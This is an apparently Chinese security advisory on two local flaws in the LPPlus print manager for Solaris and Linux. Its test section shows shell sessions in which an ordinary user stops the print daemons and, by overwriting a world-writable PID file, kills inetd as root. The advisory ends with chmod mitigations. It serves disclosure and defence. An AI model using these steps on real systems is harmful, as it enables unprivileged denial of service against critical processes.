发布日期：2000-09-07
更新日期：2000-09-07

受影响系统：

Plus Technologies LPPlus 3.3.0 for Solaris 2.x
Plus Technologies LPPlus 3.2.1 for Linux

描述：

---

LPPlus 是Plus Technologies出品的一个Unix下的打印管理系统。它存在一些安全问题

漏洞一：

  缺省安装时，LPPlus 打印管理系统有几个 setuid root 程序，
  它们包括：

    $LPHOME/bin/dccsched
    $LPHOME/bin/dcclpdser
    $LPHOME/bin/dccbkst

  这三个程序分别启动任务调度、服务器、网络状态守护进程。

    $LPHOME/bin/dccshut
    $LPHOME/bin/dcclpdshut
    $LPHOME/bin/dccbkstshut

  这三个程序分别停止三个守护进程。

  缺省时，任何用户无论他/她拥有什么权限都可以运行这六个程序。
  这导致任何用户度可以启动或停止打印服务。

漏洞二：

  $LPHOME/system/lpdprocess 文件以 777 模式创建。这个文件
包含 dcclpdser 进程的进程号。如果一个用户把它修改成别的进
程的进程号，然后运行 $LPHOME/system/lpdprocess 程序，由于
它是 setuid root 程序，那么他/她就可以关闭任何进程。

<*来源： Dixie Flatline (echo8@FIREST0RM.ORG) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

  漏洞一:

    $ id
    uid=600(test) gid=300(users)
    $ ps -ef|grep dcc
    test 26357 26351 0 18:18:06 pts/0 0:00 grep dcc
    root 26262 1 0 17:41:50 ? 0:01 /opt/lpplus/bin/dccsched
    root 26272 1 0 17:42:03 ? 0:00 /opt/lpplus/bin/dcclpdser
    root 26276 1 0 17:42:14 ? 0:00 /opt/lpplus/bin/dccbkst
    $ dccbkstshut
    $ dcclpdshut
    LPD048E Signal sent to dcclpdser to shut down.
    $ dccshut
    LPP054I LP Plus scheduler ordered to shutdown.
    $ ps -ef|grep dcc
    test 26253 26239 0 17:39:45 pts/0 0:00 grep dcc
    $

  漏洞二：

    $ id
    uid=600(test) gid=300(users)
    $ ps -ef|grep inet
    test 26285 26279 0 17:42:42 pts/0 0:00 grep inet
    root 12276 1 0 Aug 22 ? 0:00 /usr/sbin/inetd -s
    $ cat > $LPHOME/system/lpdprocess
    12276
    ^D
    $ dcclpdshut
    LPD048E Signal sent to dcclpdser to shut down.
    $ ps -ef|grep inet
    test 26291 26279 0 17:45:17 pts/0 0:00 grep inet



建议：

---

临时解决办法：

NSFOCUS建议您去除这些程序的suid root位:
chmod u-s $LPHOME/bin/dccsched
chmod u-s $LPHOME/bin/dcclpdser
chmod u-s $LPHOME/bin/dccbkst
chmod u-s $LPHOME/bin/dccshut
chmod u-s $LPHOME/bin/dcclpdshut
chmod u-s $LPHOME/bin/dccbkstshut

厂商补丁：
暂无


浏览次数：5854
严重程度：0（网友投票）